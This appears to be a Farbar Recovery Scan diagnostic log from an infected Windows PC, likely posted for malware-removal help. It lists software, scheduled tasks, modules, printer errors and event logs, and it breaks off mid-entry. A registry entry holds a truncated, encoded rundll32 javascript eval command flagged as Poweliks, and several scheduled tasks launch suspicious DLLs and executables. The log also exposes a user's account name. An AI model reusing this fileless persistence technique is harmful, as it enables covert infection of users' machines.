HiddenEDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version: - )Fax (Version: 120.0.194.000 - Hewlett-Packard) HiddenFeedback Tool (HKLM\...\{13A5E785-5197-4EAD-8EE3-D660271E49BC}) (Version: 1.2.0 - Microsoft Corporation)Glary Utilities 5.6 (HKLM\...\Glary Utilities 5) (Version: 5.6.0.13 - Glarysoft Ltd)GPBaseService2 (Version: 120.0.194.000 - Hewlett-Packard) HiddenHP Customer Participation Program 12.0 (HKLM\...\HPExtendedCapabilities) (Version: 12.0 - HP)HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)HP Imaging Device Functions 12.0 (HKLM\...\HP Imaging Device Functions) (Version: 12.0 - HP)HP Officejet 6500 E709 Series (HKLM\...\{FA0F0A01-4631-4161-A6C2-948BF694382E}) (Version: 12.0 - HP)HP Smart Web Printing (HKLM\...\HP Smart Web Printing) (Version: 4.05 - HP)HP Solution Center 12.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 12.0 - HP)HP Update (HKLM\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)HPProductAssistant (Version: 120.0.194.000 - Hewlett-Packard) HiddenHPSSupply (Version: 120.0.194.000 - Hewlett-Packard) HiddenHTC Driver Installer (HKLM\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.021 - HTC Corporation)iLumina Gold Starter Edition (HKLM\...\iLuminaStarter) (Version: 2.1 - Tyndale House Publishers, Inc)iTunes (HKLM\...\{86D04316-F49A-4AF2-B3F1-A1E943886CE7}) (Version: 11.3.1.2 - Apple Inc.)Java 6 Update 5 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160050}) (Version: 1.6.0.50 - Sun Microsystems, Inc.)Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)MarketResearch (Version: 120.0.226.000 - Hewlett-Packard) HiddenMediaDirect (HKLM\...\{9C6978E8-B6D0-4AB7-A7A0-D81A74FBF745}) (Version: 4.0 - Dell)Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version: - Microsoft Corporation)Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) HiddenMicrosoft Antimalware (Version: 3.0.8402.2 - Microsoft Corporation) HiddenMicrosoft Office 2007 Service Pack 2 (SP2) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}) (Version: - Microsoft)Microsoft Office 2007 Service Pack 2 (SP2) (Version: - Microsoft) HiddenMicrosoft Office Excel MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6425.1000 - Microsoft Corporation)Microsoft Office Home and Student 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office OneNote MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (French) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proof (Spanish) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) HiddenMicrosoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version: - Microsoft) HiddenMicrosoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) HiddenMicrosoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) HiddenMicrosoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)MSXML 4.0 SP3 Parser (HKLM\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)NETGEAR WNA1100 N150 Wireless USB Adapter (HKLM\...\{A2AE9709-283B-4B48-AA34-729C070A62FB}) (Version: 1.0.0.133 - NETGEAR)Network (Version: 120.0.194.000 - Hewlett-Packard) HiddenOCR Software by I.R.I.S. 12.0 (HKLM\...\HPOCR) (Version: 12.0 - HP)PMB (HKLM\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.2.00.03250 - Sony Corporation)ProductContext (Version: 50.0.165.000 - Hewlett-Packard) HiddenQuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: - )Roxio Creator Audio (Version: 3.7.0 - Roxio) HiddenRoxio Creator Copy (Version: 3.7.0 - Roxio) HiddenRoxio Creator Data (Version: 3.7.0 - Roxio) HiddenRoxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)Roxio Creator DE (Version: 3.7.0 - Roxio) HiddenRoxio Creator Tools (Version: 3.7.0 - Roxio) HiddenRoxio Express Labeler 3 (Version: 3.2.1 - Roxio) HiddenRoxio Update Manager (Version: 6.0.0 - Roxio) HiddenSAMSUNG USB Driver for Mobile Phones V5.16.0.0 (HKLM\...\{C0C1D2BC-72FE-4F77-A2F9-CD10D5AA8F93}) (Version: 1.2.2200.0 - SAMSUNG Electronics CO., LTD.)SamsungSimpleDL_lite (HKLM\...\InstallShield_{B8421085-B02A-4A50-9FAE-D7DF1593E1AD}) (Version: 1.0.025 - Your Company Name)SamsungSimpleDL_lite (Version: 1.0.025 - Your Company Name) HiddenScan (Version: 12.0.0.0 - Hewlett-Packard) HiddenShop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 12 - HP)Skins (Version: 2007.0731.2234.38497 - ATI) HiddenSmartWebPrinting (Version: 120.0.194.000 - Hewlett-Packard) HiddenSolutionCenter (Version: 120.0.194.000 - Hewlett-Packard) HiddenSpelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)Status (Version: 120.0.194.000 - Hewlett-Packard) HiddenToolbox (Version: 120.0.194.000 - Hewlett-Packard) HiddenTransporter (HKLM\...\{A38A6AFE-38BA-4448-B489-6045E0796503}) (Version: 3.1.1 - Winkflash)TrayApp (Version: 120.0.194.000 - Hewlett-Packard) HiddenUnloadSupport (Version: 11.0.0 - Hewlett-Packard) HiddenUpdate for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)Update for Microsoft Office 2007 suites (KB2596651) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{B7873DF5-9E1C-45EE-8895-D29C6AE01202}) (Version: - Microsoft)Update for Microsoft Office 2007 suites (KB2596789) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C20964A7-5181-45E5-9E82-72F5D400DEBF}) (Version: - Microsoft)Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version: - Microsoft)Update for Microsoft Office Excel 2007 (KB2596596) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{567103D1-96CD-4B76-93B9-2681A187DEFF}) (Version: - Microsoft)Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version: - Microsoft)Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)Walmart MP3 Music Downloads (HKLM\...\Walmart MP3 Music Downloads) (Version: 1.5.0.7 - Walmart.com)WebReg (Version: 120.0.194.000 - Hewlett-Packard) Hidden ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? ==================== Restore Points ========================= 29-07-2014 11:25:23 Scheduled Checkpoint30-07-2014 11:45:57 Scheduled Checkpoint01-08-2014 21:10:36 Scheduled Checkpoint02-08-2014 16:42:56 Scheduled Checkpoint04-08-2014 04:00:03 Scheduled Checkpoint07-08-2014 22:48:19 Scheduled Checkpoint11-08-2014 02:11:41 Scheduled Checkpoint11-08-2014 15:01:42 Scheduled Checkpoint12-08-2014 10:45:08 Scheduled Checkpoint14-08-2014 02:36:25 Scheduled Checkpoint14-08-2014 21:59:38 Tuneup Pro Thu, Aug 14, 14 17:5914-08-2014 23:31:34 Advanced-System Protector15-08-2014 23:47:04 Removed SofTest16-08-2014 13:18:06 Removed DriverUpdate16-08-2014 13:29:10 Removed HTC Sync.16-08-2014 13:44:46 Removed HTC Sync.16-08-2014 14:02:17 Removed HTC BMP USB Driver.16-08-2014 16:47:50 Advanced-System Protector16-08-2014 21:58:06 Installed AVG 201416-08-2014 22:11:41 Removed SlimCleaner Plus16-08-2014 22:14:50 Removed HTC Driver Installer.17-08-2014 19:56:09 Installed AVG 201417-08-2014 19:59:04 Installed AVG 201417-08-2014 20:03:04 Removed AVG 201417-08-2014 20:04:51 Installed AVG 201117-08-2014 21:08:16 Installed AVG 201417-08-2014 21:16:20 Installed AVG 201417-08-2014 21:24:43 Removed AVG 201417-08-2014 21:26:10 Installed AVG 201119-08-2014 21:04:48 Advanced-System Protector21-08-2014 01:40:12 Advanced-System Protector23-08-2014 20:47:11 Checkpoint by HitmanPro ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2014-08-23 14:19 - 2014-08-24 15:40 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts127.0.0.1 localhost ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {1899DF80-FF95-4C6F-B87A-DB0FDFCF4313} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - savas.kyriakidis => C:\Program Files\Windows Calendar\wincal.exe [2009-04-11] (Microsoft Corporation)Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMMTask: {1D455FF0-01E6-438C-A9D6-27C72AC03552} - \PC Performer No Task File <==== ATTENTIONTask: {219889BA-90E3-4298-B815-4C452D260575} - System32\Tasks\AdobeFlashPlayerUpdate => C:\Windows\system32\FlashPlayerUpdateService.exeTask: {2343967C-C69F-44DE-8AA3-E9113A3466E5} - System32\Tasks\Security Center Update - 754758581 => C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu\hyidd.exeTask: {239D58F4-E8C7-48B2-A92C-0C20674542F1} - System32\Tasks\The Bluetooth service discovery => C:\Windows\system32\Drivers\blds.exeTask: {28940D65-5F6A-439A-B94B-EA3ECA5F5756} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => c:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)Task: {29F51FCF-C86F-4A73-A53D-79BCBC7A3C26} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-04-17] (Piriform Ltd)Task: {2BA5B600-850D-4223-A601-8879523AF452} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)Task: {30B9F70E-3CAE-49C3-9D96-BE89B7AA59AB} - System32\Tasks\Time Trigger Test Task => Rundll32.exe "C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll",DllRegisterServerTask: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UITask: {3844EB23-D7D9-42B5-8061-C5A6B5F42FE0} - System32\Tasks\DriverUpdate Daily Scan => C:\Program Files\DriverUpdate\DriverUpdate.exeTask: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPagesTask: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)Task: {44E2A9D0-91BC-474D-8776-1068F7A8A6C6} - System32\Tasks\AdobeFlashPlayerUpdate 2 => C:\Windows\system32\FlashPlayerUpdateService.exeTask: {4512337B-4691-4F43-9FBB-0095C346DDE6} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)Task: {510F6543-BD19-48A5-9E5E-D5E371879760} - System32\Tasks\AVG\PC Tuneup 2011\Integrator\Start On Rita Logon => C:\Program Files\AVG\AVG PC Tuneup 2011\BoostSpeed.exeTask: {63809C38-FE18-4A88-92FF-44D0365CAFA2} - System32\Tasks\GlaryInitialize 5 => C:\Program Files\Glary Utilities 5\Initialize.exe [2014-08-17] (Glarysoft Ltd)Task: {788B04FA-AA4F-4BCC-9AAE-A2881E7E64E6} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTIONTask: {C22BB22A-70B9-4AEA-B6E6-2234A457F078} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - savas.kyriakidis) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exeTask: {DD48E073-3A6C-4D31-8602-D1B57F4180B5} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-03-06] (Realtek)Task: {E14F36AE-800F-4A81-94F3-BFD7740E1952} - System32\Tasks\Apple Diagnostics => C:\Program Files\Common Files\Apple\Internet Services\EReporter.exe [2013-10-31] (Apple Inc.)Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()Task: {FCAFF07B-D3AC-4A0C-A6E2-6C23DFC270C9} - System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5} => C:\Windows\system32\jsllnzn.dll/s "C:\Windows\system32\jsllnzn.dll" (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\GlaryInitialize 5.job => C:\Program Files\Glary Utilities 5\Initialize.exeTask: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe ==================== Loaded Modules (whitelisted) ============= 2014-07-31 12:16 - 2014-07-31 12:16 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll2014-07-31 12:16 - 2014-07-31 12:16 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll2012-03-23 14:25 - 2012-03-23 14:25 - 00087040 _____ () C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe2012-05-16 21:52 - 2010-08-04 14:44 - 00266240 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe2012-05-16 21:52 - 2010-03-10 14:50 - 00360448 _____ () C:\Program Files\NETGEAR\WNA1100\WifiLib.dll2011-10-13 03:28 - 2011-10-13 03:28 - 00223744 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\5d71f5ae06ea0338fa4e266ac77cf988\VistaBridgeLibrary.ni.dll2013-09-14 01:51 - 2013-09-14 01:51 - 00087952 _____ () C:\Program Files\Common Files\Apple\Internet Services\zlib1.dll2013-09-14 01:50 - 2013-09-14 01:50 - 01242952 _____ () C:\Program Files\Common Files\Apple\Internet Services\libxml2.dll2014-08-20 18:08 - 2014-08-20 18:06 - 00325632 _____ () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll2012-05-16 21:52 - 2011-01-04 15:34 - 04545024 _____ () C:\Program Files\NETGEAR\WNA1100\WNA1100.exe2012-05-16 21:52 - 2009-08-28 16:50 - 00282624 _____ () C:\Program Files\NETGEAR\WNA1100\WifiSvcLib.dll2014-08-17 21:06 - 2014-08-17 21:06 - 00080160 _____ () C:\Program Files\Glary Utilities 5\zlib1.dll2014-08-23 17:21 - 2014-08-23 17:21 - 08537928 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\pdf.dll2014-08-23 17:21 - 2014-08-23 17:21 - 00353096 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ppGoogleNaClPluginChrome.dll2014-08-23 17:21 - 2014-08-23 17:21 - 01732936 _____ () C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ffmpegsumo.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2 ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ==================== Faulty Device Manager Devices ============= Name: Microsoft 6to4 Adapter #2Description: Microsoft 6to4 AdapterClass Guid: {4d36e972-e325-11ce-bfc1-08002be10318}Manufacturer: MicrosoftService: tunnelProblem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)Resolution: Update the driver Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet 1022nDescription: HP LaserJet 1022nClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Deskjet 6940 seriesDescription: Deskjet 6940 seriesClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: HPService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: hp LaserJet 2420Description: hp LaserJet 2420Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Deskjet 6980 seriesDescription: Deskjet 6980 seriesClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: HPService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Deskjet 6980 seriesDescription: Deskjet 6980 seriesClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: HPService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet P2035nDescription: HP LaserJet P2035nClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet CP1025nwDescription: HP LaserJet CP1025nwClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP Color LaserJet CP2025dnDescription: HP Color LaserJet CP2025dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet Professional P1606dnDescription: HP LaserJet Professional P1606dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet P2035nDescription: HP LaserJet P2035nClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP LaserJet 200 color M251nwDescription: HP LaserJet 200 color M251nwClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: HP Color LaserJet CP2025dnDescription: HP Color LaserJet CP2025dnClass Guid: {4d36e971-e325-11ce-bfc1-08002be10318}Manufacturer: Hewlett-PackardService: Problem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ========================= Application errors:==================Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\FIL\MESSAGES.JSON> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\48.PNG> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\32.PNG> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\FI\MESSAGES.JSON> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\16.PNG> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\128.PNG> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ET\MESSAGES.JSON> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/25/2014 09:26:47 AM) (Source: Windows 